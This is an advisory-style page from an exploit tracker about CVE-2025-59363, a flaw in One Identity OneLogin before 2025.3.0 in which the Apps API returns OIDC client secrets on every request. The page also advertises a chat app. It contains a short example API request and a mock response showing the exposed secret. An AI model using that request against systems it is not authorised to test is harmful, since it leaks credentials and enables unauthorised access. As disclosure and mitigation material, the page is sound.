Ameeba Exploit Tracker

Tracking CVEs, exploits, and zero-days for defensive cybersecurity research.

Ameeba Blog Search
TRENDING · 1 WEEK
Attack Vector
Vendor
Severity

CVE-2025-59363: One Identity OneLogin OIDC Client Secret Exposure

Ameeba Chat Store screens
Download Ameeba Chat

Overview

The vulnerability CVE-2025-59363 is a critical security flaw found in the One Identity OneLogin system. This flaw affects versions prior to 2025.3.0, making it possible for potential attackers to potentially gain unauthorized access to OIDC client secrets. This can lead to system compromise and data leakage, posing a significant threat to the privacy and integrity of sensitive information.

Vulnerability Summary

CVE ID: CVE-2025-59363
Severity: High (7.7)
Attack Vector: Network
Privileges Required: Low
User Interaction: None
Impact: Potential system compromise and data leakage

Affected Products

Ameeba Chat Icon Escape the Surveillance Era

Most apps won’t tell you the truth.
They’re part of the problem.

Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.

Ameeba Chat gives you a way out.

  • • No phone number
  • • No email
  • • No personal info
  • • Anonymous aliases
  • • End-to-end encrypted

Chat without a trace.

Product | Affected Versions

One Identity OneLogin | Before 2025.3.0

How the Exploit Works

The vulnerability is due to the inappropriate handling of OIDC client secrets by the GET Apps API v2 in One Identity OneLogin. Instead of returning this secret only when an App is first created, the system returns it with every request. This exposes the OIDC client secret to unauthorized viewers, potentially allowing them to gain unauthorized access to the system.

Conceptual Example Code

Below is a conceptual example of a simple HTTP GET request to exploit this vulnerability:

GET /api/v2/apps HTTP/1.1
Host: target.onelogin.com
Authorization: Bearer <access_token>

The response in a vulnerable system will include the OIDC client secret:

HTTP/1.1 200 OK
Content-Type: application/json
{
"apps": [
{
"id": 12345,
"name": "Vulnerable app",
"oidc_client_secret": "exposed_secret"
}
]
}

Mitigation Guidance

To mitigate this vulnerability, affected users are advised to apply the latest patch provided by the vendor. In the absence of a patch, using a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can serve as temporary mitigation. Nevertheless, applying the vendor’s patch is the recommended and most thorough solution.

Want to discuss this further? Join the Ameeba Cybersecurity Group Chat.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.
Ameeba Chat